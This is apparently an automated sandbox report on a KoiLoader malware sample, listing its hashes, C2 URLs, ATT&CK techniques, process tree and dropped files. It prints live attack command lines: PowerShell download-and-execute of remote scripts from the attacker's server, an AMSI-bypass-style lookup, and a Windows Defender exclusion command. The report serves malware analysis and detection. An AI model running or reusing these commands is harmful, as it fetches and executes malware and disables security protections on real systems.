koiloader | e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819

Analysis

max time kernel
139s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29/11/2024, 22:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mysetup.exe
Size

2.2MB
MD5

5cb042f9877f5876a19c86ded15fb1f8
SHA1

12249b4e9e8f5a3d66259d9172f8b6d4225812ab
SHA256

e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819
SHA512

f6c4c9198de1d3a18815db38e50f36f7f73103a050f07c73ad83e05371a7a13be985a84c437ce27a74638d96fffda1eb860fa3b7923e47d020a3912cecd3f490
SSDEEP

49152:FBuZrEUcH4ytTJpIbxrvfqKIy029s4C1eH9K:jkLcH4ytItfgt29s4C1eH9K

Score

10^/10

koiloader discovery execution loader

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://79.124.78.109/wp-includes/phyllopodan7V7GD.php

exe.dropper

http://79.124.78.109/wp-includes/barasinghaby.ps1

Extracted

Family

koiloader

http://79.124.78.109/flocking.php

Signatures

KoiLoader
KoiLoader is a malware loader written in C++.
loader koiloader
Koiloader family
koiloader

Detects KoiLoader payload 1 IoCs

loader

resource	yara_rule
behavioral2/memory/2388-53-0x0000000007F00000-0x0000000007F0D000-memory.dmp	family_koi_loader

Blocklisted process makes network request 6 IoCs

flow	pid	Process
7	1028	powershell.exe
19	2388	powershell.exe
20	2388	powershell.exe
22	2600	powershell.exe
43	2388	powershell.exe
48	2388	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4452	powershell.exe
1028	powershell.exe
2600	powershell.exe
2388	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
4380	mysetup.tmp

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mysetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mysetup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1028	powershell.exe
1028	powershell.exe
2388	powershell.exe
2388	powershell.exe
4452	powershell.exe
4452	powershell.exe
2600	powershell.exe
2600	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 1368 wrote to memory of 4380	1368	mysetup.exe	82
PID 1368 wrote to memory of 4380	1368	mysetup.exe	82
PID 1368 wrote to memory of 4380	1368	mysetup.exe	82
PID 4380 wrote to memory of 1028	4380	mysetup.tmp	83
PID 4380 wrote to memory of 1028	4380	mysetup.tmp	83
PID 1028 wrote to memory of 3968	1028	powershell.exe	85
PID 1028 wrote to memory of 3968	1028	powershell.exe	85
PID 3968 wrote to memory of 2388	3968	wscript.exe	87
PID 3968 wrote to memory of 2388	3968	wscript.exe	87
PID 3968 wrote to memory of 2388	3968	wscript.exe	87
PID 4624 wrote to memory of 4408	4624	DllHost.exe	92
PID 4624 wrote to memory of 4408	4624	DllHost.exe	92
PID 4624 wrote to memory of 4408	4624	DllHost.exe	92
PID 4408 wrote to memory of 4452	4408	cmd.exe	94
PID 4408 wrote to memory of 4452	4408	cmd.exe	94
PID 4408 wrote to memory of 4452	4408	cmd.exe	94
PID 2388 wrote to memory of 212	2388	powershell.exe	96
PID 2388 wrote to memory of 212	2388	powershell.exe	96
PID 2388 wrote to memory of 212	2388	powershell.exe	96
PID 212 wrote to memory of 2600	212	cmd.exe	98
PID 212 wrote to memory of 2600	212	cmd.exe	98
PID 212 wrote to memory of 2600	212	cmd.exe	98

C:\Users\Admin\AppData\Local\Temp\mysetup.exe
"C:\Users\Admin\AppData\Local\Temp\mysetup.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1368
- C:\Users\Admin\AppData\Local\Temp\is-1AMH5.tmp\mysetup.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-1AMH5.tmp\mysetup.tmp" /SL5="$A0064,1414311,832512,C:\Users\Admin\AppData\Local\Temp\mysetup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4380
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" -command IWR -UseBasicParsing -Uri 'http://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\vqPM0l4stR.js'); wscript ($env:temp+'\vqPM0l4stR.js');
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1028
  - - C:\Windows\system32\wscript.exe
      "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\vqPM0l4stR.js
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3968
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'http://79.124.78.109/wp-includes/phyllopodan7V7GD.php'; $l2 = 'http://79.124.78.109/wp-includes/barasinghaby.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zTIN7KN9FPZ'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2388
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2600

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4624
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4452

C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\ProgramData\ra63d6fdc-08cb-4232-ab51-76cafdcb4d96r.js"
1⤵
PID:2972

C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\ProgramData\ra63d6fdc-08cb-4232-ab51-76cafdcb4d96r.js"
1⤵
PID:3784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
a4c64db4b6e427a4e58656d764d68010

SHA1
4867034075915f4c342bb83e6afa7b08c3049da6

SHA256
d2ecc00be94d4e35b55383043fad2176e41272a85678ea452d6119e9982e15f7

SHA512
66a698a3e0ae44e7cb8ed34f298e23dedabda48baa275e41f29d23a641aca04b197f69b7d62b6a7bcf591f8ce27aa467853ce432681d968cae78054d7c1dd684

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ymwugdr1.edr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-1AMH5.tmp\mysetup.tmp

Filesize
3.1MB

MD5
75ff4b69506691689c816c05782e97e7

SHA1
232ca459d1a83d8794ee30c96422a77739a57ad4

SHA256
f5416883c1a43a0b96e48c1da17d38c586f8d6a9b7d9978845e119df4c98f76f

SHA512
3c0e0d41d899f19933aabc0a8f86ce9b9c4d1ea6bdac74f07ee95792be6bcbb7b9b4ce0c2fe148024077a28287b742971ad788f5c08b3e90d47099e1664b06bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\vqPM0l4stR.js

Filesize
1KB

MD5
70e7b9c621b788d2da048d31db40c24d

SHA1
67a0f2de1e535eb72d1df05579f628e29e0a2fcf

SHA256
854d48b8a145769476dcb979852100645c0567d5f8d85d5a61c496a39c14bffe

SHA512
7c397fe63f460d812f9be731a549eef082fb8c34d05a9481d38f42546633f03fce5b921163c4e4ecc17ac351aae55eee0362822c6eb12684fff99455e162857e

Download Submit
memory/1028-13-0x00007FF814CB3000-0x00007FF814CB5000-memory.dmp

Filesize
8KB

Download
memory/1028-14-0x00000247643E0000-0x0000024764402000-memory.dmp

Filesize
136KB

Download
memory/1028-24-0x00007FF814CB0000-0x00007FF815771000-memory.dmp

Filesize
10.8MB

Download
memory/1028-25-0x00007FF814CB0000-0x00007FF815771000-memory.dmp

Filesize
10.8MB

Download
memory/1028-30-0x00007FF814CB0000-0x00007FF815771000-memory.dmp

Filesize
10.8MB

Download
memory/1368-12-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/1368-2-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/1368-0-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/2388-50-0x0000000006B60000-0x0000000006B7A000-memory.dmp

Filesize
104KB

Download
memory/2388-51-0x0000000007FC0000-0x000000000863A000-memory.dmp

Filesize
6.5MB

Download
memory/2388-35-0x0000000006080000-0x00000000060E6000-memory.dmp

Filesize
408KB

Download
memory/2388-36-0x00000000060F0000-0x0000000006156000-memory.dmp

Filesize
408KB

Download
memory/2388-46-0x0000000006170000-0x00000000064C4000-memory.dmp

Filesize
3.3MB

Download
memory/2388-33-0x0000000005960000-0x0000000005F88000-memory.dmp

Filesize
6.2MB

Download
memory/2388-48-0x0000000006760000-0x000000000677E000-memory.dmp

Filesize
120KB

Download
memory/2388-49-0x0000000006820000-0x000000000686C000-memory.dmp

Filesize
304KB

Download
memory/2388-32-0x00000000051B0000-0x00000000051E6000-memory.dmp

Filesize
216KB

Download
memory/2388-34-0x00000000058F0000-0x0000000005912000-memory.dmp

Filesize
136KB

Download
memory/2388-52-0x0000000007E60000-0x0000000007E61000-memory.dmp

Filesize
4KB

Download
memory/2388-53-0x0000000007F00000-0x0000000007F0D000-memory.dmp

Filesize
52KB

Download
memory/2600-101-0x00000000087F0000-0x0000000008882000-memory.dmp

Filesize
584KB

Download
memory/2600-97-0x0000000007E90000-0x0000000007EB2000-memory.dmp

Filesize
136KB

Download
memory/2600-100-0x0000000008700000-0x0000000008750000-memory.dmp

Filesize
320KB

Download
memory/2600-99-0x00000000085B0000-0x00000000085CA000-memory.dmp

Filesize
104KB

Download
memory/2600-98-0x0000000008C30000-0x00000000091D4000-memory.dmp

Filesize
5.6MB

Download
memory/4380-6-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/4380-10-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/4452-78-0x0000000006CD0000-0x0000000006D73000-memory.dmp

Filesize
652KB

Download
memory/4452-92-0x0000000007040000-0x0000000007054000-memory.dmp

Filesize
80KB

Download
memory/4452-93-0x0000000007140000-0x000000000715A000-memory.dmp

Filesize
104KB

Download
memory/4452-94-0x0000000007120000-0x0000000007128000-memory.dmp

Filesize
32KB

Download
memory/4452-91-0x0000000007030000-0x000000000703E000-memory.dmp

Filesize
56KB

Download
memory/4452-90-0x0000000007000000-0x0000000007011000-memory.dmp

Filesize
68KB

Download
memory/4452-89-0x0000000007080000-0x0000000007116000-memory.dmp

Filesize
600KB

Download
memory/4452-88-0x0000000006E70000-0x0000000006E7A000-memory.dmp

Filesize
40KB

Download
memory/4452-77-0x00000000060B0000-0x00000000060CE000-memory.dmp

Filesize
120KB

Download
memory/4452-66-0x0000000006C90000-0x0000000006CC2000-memory.dmp

Filesize
200KB

Download
memory/4452-67-0x0000000070BC0000-0x0000000070C0C000-memory.dmp

Filesize
304KB

Download